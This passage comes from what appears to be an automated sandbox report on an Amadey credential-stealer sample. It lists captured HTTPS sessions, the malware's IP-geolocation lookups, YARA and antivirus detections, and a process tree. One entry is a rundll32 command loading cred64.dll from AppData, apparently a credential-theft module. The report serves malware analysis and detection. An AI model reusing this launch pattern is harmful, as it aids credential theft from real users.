                                                                                                                                                                                                                                      Cookie: NID=513=Wn_CXjX-2VcI2iEH6-uf7IUePLFc4zBcZ5vvY-BWgQvpNRI2f83XMZSN8I8vpr_zVSnn2kuylSlPWe9bMQ9F7_ZSYiXZB3ejeKgovAjDWcyn1Rq4N3Q7gs6ZYzU-MpFJmgiei_3kV_Pkj1gTb1dtpR074N1k4RWBiyHeYX0t3hs
2024-04-19 01:29:54 UTC | 1035 | OUT | Data Ascii: [[1,null,null,null,null,null,null,null,null,null,[null,null,null,null,"en",null,"boq_identityfrontendauthuiserver_20240414.08_p0",null,[[["Google Chrome","117"],["Not;A=Brand","8"],["Chromium","117"]],0,"Windows","10.0.0","x86","","117.0.5938.132"],[4,0,0
2024-04-19 01:29:54 UTC | 523 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Access-Control-Allow-Origin: https://accounts.google.com
                                                                                                                                                                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                      Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                      Access-Control-Allow-Headers: X-Playlog-Web
                                                                                                                                                                                                                                      Content-Type: text/plain; charset=UTF-8
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:54 GMT
                                                                                                                                                                                                                                      Server: Playlog
                                                                                                                                                                                                                                      Cache-Control: private
                                                                                                                                                                                                                                      X-XSS-Protection: 0
                                                                                                                                                                                                                                      X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                      Accept-Ranges: none
                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
2024-04-19 01:29:54 UTC | 137 | IN | Data Ascii: 83["-1",null,[[["ANDROID_BACKUP",0],["BATTERY_STATS",0],["SMART_SETUP",0],["TRON",0]],-3334737594024971225],[],{"175237375":[10000]}]
2024-04-19 01:29:54 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
32 | 192.168.2.5 | 49849 | 40.126.29.15 | 443 | |
Timestamp | Bytes transferred | Direction | Data
2024-04-19 01:29:55 UTC | 422 | OUT | POST /RST2.srf HTTP/1.0
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/soap+xml
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                                                      Content-Length: 4775
                                                                                                                                                                                                                                      Host: login.live.com
2024-04-19 01:29:55 UTC | 4775 | OUT | Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
2024-04-19 01:29:55 UTC | 569 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                      Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                                                                      Expires: Fri, 19 Apr 2024 01:28:55 GMT
                                                                                                                                                                                                                                      P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                                                      Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                      x-ms-route-info: C517_SN1
                                                                                                                                                                                                                                      x-ms-request-id: 132f8987-4a20-426a-8b3f-ad7bb169bcc3
                                                                                                                                                                                                                                      PPServer: PPV: 30 H: SN1PEPF0002F030 V: 0
                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:54 GMT
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Content-Length: 11390
2024-04-19 01:29:55 UTC | 11390 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
33 | 192.168.2.5 | 49852 | 40.126.29.15 | 443 | |
Timestamp | Bytes transferred | Direction | Data
2024-04-19 01:29:55 UTC | 422 | OUT | POST /RST2.srf HTTP/1.0
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/soap+xml
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                                                      Content-Length: 4775
                                                                                                                                                                                                                                      Host: login.live.com
2024-04-19 01:29:55 UTC | 4775 | OUT |
                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
2024-04-19 01:29:56 UTC | 569 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                      Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                                                                      Expires: Fri, 19 Apr 2024 01:28:56 GMT
                                                                                                                                                                                                                                      P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                                                      Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                      x-ms-route-info: C517_SN1
                                                                                                                                                                                                                                      x-ms-request-id: 94d47410-a5a4-4704-b59d-ecc5abcccd57
                                                                                                                                                                                                                                      PPServer: PPV: 30 H: SN1PEPF0002F02B V: 0
                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:55 GMT
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Content-Length: 11390
2024-04-19 01:29:56 UTC | 11390 | IN |
                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.5 | 49855 | 40.126.29.15 | 443 |  |
Timestamp | Bytes transferred | Direction | Data
2024-04-19 01:29:56 UTC | 422 | OUT | POST /RST2.srf HTTP/1.0
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/soap+xml
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                                                      Content-Length: 4775
                                                                                                                                                                                                                                      Host: login.live.com
2024-04-19 01:29:56 UTC | 4775 | OUT |
                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
2024-04-19 01:29:57 UTC | 569 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                      Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                                                                      Expires: Fri, 19 Apr 2024 01:28:57 GMT
                                                                                                                                                                                                                                      P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                                                      Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                      x-ms-route-info: C517_SN1
                                                                                                                                                                                                                                      x-ms-request-id: 6be07b22-f55d-4fe1-a790-b804e60b99d2
                                                                                                                                                                                                                                      PPServer: PPV: 30 H: SN1PEPF0002FAB3 V: 0
                                                                                                                                                                                                                                      X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                      X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:29:56 GMT
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      Content-Length: 11390
2024-04-19 01:29:57 UTC | 11390 | IN |
                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.5 | 49874 | 34.117.186.192 | 443 | 7476 | C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-19 01:30:05 UTC | 237 | OUT | GET /widget/demo/81.181.57.52 HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Referer: https://ipinfo.io/
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Host: ipinfo.io
2024-04-19 01:30:05 UTC | 513 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      server: nginx/1.24.0
                                                                                                                                                                                                                                      date: Fri, 19 Apr 2024 01:30:05 GMT
                                                                                                                                                                                                                                      content-type: application/json; charset=utf-8
                                                                                                                                                                                                                                      Content-Length: 980
                                                                                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                      x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                                                                                      referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                      x-envoy-upstream-service-time: 2
                                                                                                                                                                                                                                      via: 1.1 google
                                                                                                                                                                                                                                      strict-transport-security: max-age=2592000; includeSubDomains
                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                      Connection: close
2024-04-19 01:30:05 UTC | 742 | IN |
                                                                                                                                                                                                                                      Data Ascii: { "input": "81.181.57.52", "data": { "ip": "81.181.57.52", "city": "Atlanta", "region": "Georgia", "country": "US", "loc": "33.7490,-84.3880", "org": "AS212238 Datacamp Limited", "postal": "30302", "timezone": "America/
2024-04-19 01:30:05 UTC | 238 | IN |
                                                                                                                                                                                                                                      Data Ascii: address": "Averescu Maresal 8-10, Bucharest, Romania", "country": "RO", "email": "abuse-binbox@rnc.ro", "name": "Abuse contact role object", "network": "81.181.48.0/20", "phone": "+40 378 600 000" } }}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.5 | 49878 | 104.26.5.15 | 443 | 7476 | C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-19 01:30:05 UTC | 261 | OUT | GET /demo/home.php?s=81.181.57.52 HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Host: db-ip.com
2024-04-19 01:30:05 UTC | 654 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:05 GMT
                                                                                                                                                                                                                                      Content-Type: application/json
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      x-iplb-request-id: AC4546DE:9DC0_93878F2E:0050_6621C91D_8C5D355:7B63
                                                                                                                                                                                                                                      x-iplb-instance: 59128
                                                                                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uvC68%2BGzSO%2FFqbJpGfiCrT57xqq5L2O3mBSD3UZIxUorJqEarsPEfE57UjLXgBipg1I8kj4ATRZ4lZ0UqW8k%2FtRupcXT4psTNAHy8gtuZfeRsWFJ5IbRdh81wg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                      CF-RAY: 87692099b85144f1-ATL
                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
2024-04-19 01:30:05 UTC | 85 | IN | Data Raw: 34 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 6f 6b 22 2c 22 64 65 6d 6f 49 6e 66 6f 22 3a 7b 22 65 72 72 6f 72 22 3a 22 6f 76 65 72 20 71 75 65 72 79 20 6c 69 6d 69 74 2c 20 70 6c 65 61 73 65 20 74 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 22 7d 7d 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 4f{"status":"ok","demoInfo":{"error":"over query limit, please try again later"}}
2024-04-19 01:30:05 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 0


Session ID:37
Source IP:192.168.2.5
Source Port:49923
Destination IP:34.117.186.192
Destination Port:443
Timestamp | Bytes transferred | Direction | Data
2024-04-19 01:30:17 UTC | 237 | OUT | GET /widget/demo/81.181.57.52 HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Referer: https://ipinfo.io/
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Host: ipinfo.io
2024-04-19 01:30:17 UTC | 513 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      server: nginx/1.24.0
                                                                                                                                                                                                                                      date: Fri, 19 Apr 2024 01:30:17 GMT
                                                                                                                                                                                                                                      content-type: application/json; charset=utf-8
                                                                                                                                                                                                                                      Content-Length: 980
                                                                                                                                                                                                                                      access-control-allow-origin: *
                                                                                                                                                                                                                                      x-frame-options: SAMEORIGIN
                                                                                                                                                                                                                                      x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                      x-content-type-options: nosniff
                                                                                                                                                                                                                                      referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                      x-envoy-upstream-service-time: 4
                                                                                                                                                                                                                                      via: 1.1 google
                                                                                                                                                                                                                                      strict-transport-security: max-age=2592000; includeSubDomains
                                                                                                                                                                                                                                      Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                      Connection: close
2024-04-19 01:30:17 UTC | 742 | IN
                                                                                                                                                                                                                                      Data Ascii: { "input": "81.181.57.52", "data": { "ip": "81.181.57.52", "city": "Atlanta", "region": "Georgia", "country": "US", "loc": "33.7490,-84.3880", "org": "AS212238 Datacamp Limited", "postal": "30302", "timezone": "America/
2024-04-19 01:30:17 UTC | 238 | IN
                                                                                                                                                                                                                                      Data Ascii: address": "Averescu Maresal 8-10, Bucharest, Romania", "country": "RO", "email": "abuse-binbox@rnc.ro", "name": "Abuse contact role object", "network": "81.181.48.0/20", "phone": "+40 378 600 000" } }}


Session ID:38
Source IP:192.168.2.5
Source Port:49925
Destination IP:104.26.5.15
Destination Port:443
Timestamp | Bytes transferred | Direction | Data
2024-04-19 01:30:17 UTC | 261 | OUT | GET /demo/home.php?s=81.181.57.52 HTTP/1.1
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                      Host: db-ip.com
2024-04-19 01:30:18 UTC | 650 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:30:18 GMT
                                                                                                                                                                                                                                      Content-Type: application/json
                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      x-iplb-request-id: AC471F97:A928_93878F2E:0050_6621C92A_8C5D50E:7B63
                                                                                                                                                                                                                                      x-iplb-instance: 59128
                                                                                                                                                                                                                                      CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eYv05HjRhLHsdVz1gxyROdeitHSLFuKQwi1zS3%2BGWpbkfuD5Jie98lXhCBpNKKVNoSrBNCi38PA6AbprqfWfMozsFi7IwIPYPFUK2YNNpGKNkoMi0kaNCdPQcw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                      CF-RAY: 876920e6bb36ada7-ATL
                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
2024-04-19 01:30:18 UTC | 85 | IN | Data Raw: 34 66 0d 0a 7b 22 73 74 61 74 75 73 22 3a 22 6f 6b 22 2c 22 64 65 6d 6f 49 6e 66 6f 22 3a 7b 22 65 72 72 6f 72 22 3a 22 6f 76 65 72 20 71 75 65 72 79 20 6c 69 6d 69 74 2c 20 70 6c 65 61 73 65 20 74 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 22 7d 7d 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 4f{"status":"ok","demoInfo":{"error":"over query limit, please try again later"}}
2024-04-19 01:30:18 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                      Data Ascii: 0


Session ID:39
Source IP:192.168.2.5
Source Port:50555
Destination IP:20.189.173.25
Destination Port:443
Timestamp | Bytes transferred | Direction | Data
2024-04-19 01:33:14 UTC | 828 | OUT | POST /OneCollector/1.0/ HTTP/1.1
                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                      APIKey: cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521
                                                                                                                                                                                                                                      AuthMsaDeviceTicket: t=GwAWAbuEBAAU2qcZHJoKGNizGOeyqM4OaIoSZ0MOZgAAENhIsZk1icdmK4NNtUk6KLPgAMvy17Udgd1MlHE7GXRAxu9wDd84HaOk1nGIMKru6radFnZDfu7zWhcmz9j72MdI/lM5JykN5JyMCsrKKjhnWsxMrSmUTHFAm4lCtsR/4kXJ5OVGBubVm1qKlLaqfTPe4/QIS6EsPZhp2A+GbXPmd9v7KWe0y9ZBVkGnVgT2XAL69MHD65Z2sZ/bvdyK2Z9GRgl5dhajOwb9unLzQz2LihgZzhVMiIEIlP0Ox0qtNEB072yB6rGFSpbQMfXp3Qm9wrLMHPG0cNIMKQ3+lgA3sY/VTGnPGJVnsHSsfW8D9dyBIAE=&p=
                                                                                                                                                                                                                                      Client-Id: NO_AUTH
                                                                                                                                                                                                                                      Content-Encoding: deflate
                                                                                                                                                                                                                                      Content-Type: application/bond-compact-binary
                                                                                                                                                                                                                                      Expect: 100-continue
                                                                                                                                                                                                                                      SDK-Version: EVT-Windows-C++-No-3.4.15.1
                                                                                                                                                                                                                                      Upload-Time: 1713490393138
                                                                                                                                                                                                                                      Host: self.events.data.microsoft.com
                                                                                                                                                                                                                                      Content-Length: 7974
                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                      Cache-Control: no-cache
2024-04-19 01:33:14 UTC | 7974 | OUT | Data Raw: (binary request body, Content-Encoding: deflate)
2024-04-19 01:33:14 UTC | 25 | IN | HTTP/1.1 100 Continue
2024-04-19 01:33:14 UTC | 443 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                      Content-Length: 9
                                                                                                                                                                                                                                      Content-Type: application/json
                                                                                                                                                                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                      time-delta-millis: 1217
                                                                                                                                                                                                                                      Access-Control-Allow-Headers: time-delta-millis
                                                                                                                                                                                                                                      Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                      Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                      Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                      Date: Fri, 19 Apr 2024 01:33:14 GMT
                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                      {"acc":4}



                                                                                                                                                                                                                                      Target ID:0
                                                                                                                                                                                                                                      Start time:03:27:56
                                                                                                                                                                                                                                      Start date:19/04/2024
                                                                                                                                                                                                                                      Path:C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.15237.11182.exe"
                                                                                                                                                                                                                                      Imagebase:0xb80000
                                                                                                                                                                                                                                      File size:2'962'432 bytes
                                                                                                                                                                                                                                      MD5 hash:F854143C49C4D2FA4CF73BAB97BA8D3A
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000000.00000003.2052123987.0000000004FE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000000.00000002.2139306429.0000000000B81000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:2
                                                                                                                                                                                                                                      Start time:03:28:00
                                                                                                                                                                                                                                      Start date:19/04/2024
                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      Imagebase:0x700000
                                                                                                                                                                                                                                      File size:2'962'432 bytes
                                                                                                                                                                                                                                      MD5 hash:F854143C49C4D2FA4CF73BAB97BA8D3A
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000002.00000002.2130672754.0000000000701000.00000040.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000002.00000003.2089957305.00000000046B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      Antivirus matches:
                                                                                                                                                                                                                                      • Detection: 100%, Avira
                                                                                                                                                                                                                                      • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                      • Detection: 50%, ReversingLabs
                                                                                                                                                                                                                                      • Detection: 54%, Virustotal, Browse
                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:3
                                                                                                                                                                                                                                      Start time:03:28:02
                                                                                                                                                                                                                                      Start date:19/04/2024
                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe"
                                                                                                                                                                                                                                      Imagebase:0x700000
                                                                                                                                                                                                                                      File size:2'962'432 bytes
                                                                                                                                                                                                                                      MD5 hash:F854143C49C4D2FA4CF73BAB97BA8D3A
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000003.00000002.2151058621.0000000000701000.00000040.00000001.01000000.00000008.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey's stealer DLL, Source: 00000003.00000003.2110741282.0000000004D70000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:6
                                                                                                                                                                                                                                      Start time:03:29:00
                                                                                                                                                                                                                                      Start date:19/04/2024
                                                                                                                                                                                                                                      Path:C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                                                                                                                                                                                      Imagebase:0x700000
                                                                                                                                                                                                                                      File size:2'962'432 bytes
                                                                                                                                                                                                                                      MD5 hash:F854143C49C4D2FA4CF73BAB97BA8D3A
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Yara matches:
                                                                                                                                                                                                                                      • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000006.00000003.2687465416.0000000004F30000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                      Has exited:false

                                                                                                                                                                                                                                      Target ID:7
                                                                                                                                                                                                                                      Start time:03:29:05
                                                                                                                                                                                                                                      Start date:19/04/2024
                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                      Commandline:"C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
                                                                                                                                                                                                                                      Imagebase:0xb90000
                                                                                                                                                                                                                                      File size:61'440 bytes
                                                                                                                                                                                                                                      MD5 hash:889B99C52A60DD49227C5E485A016679
                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                      Target ID:8
                                                                                                                                                                                                                                      Start time:03:29:06
                                                                                                                                                                                                                                      Start date:19/04/2024
                                                                                                                                                                                                                                      Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                                                      Wow64 process (32bit):false
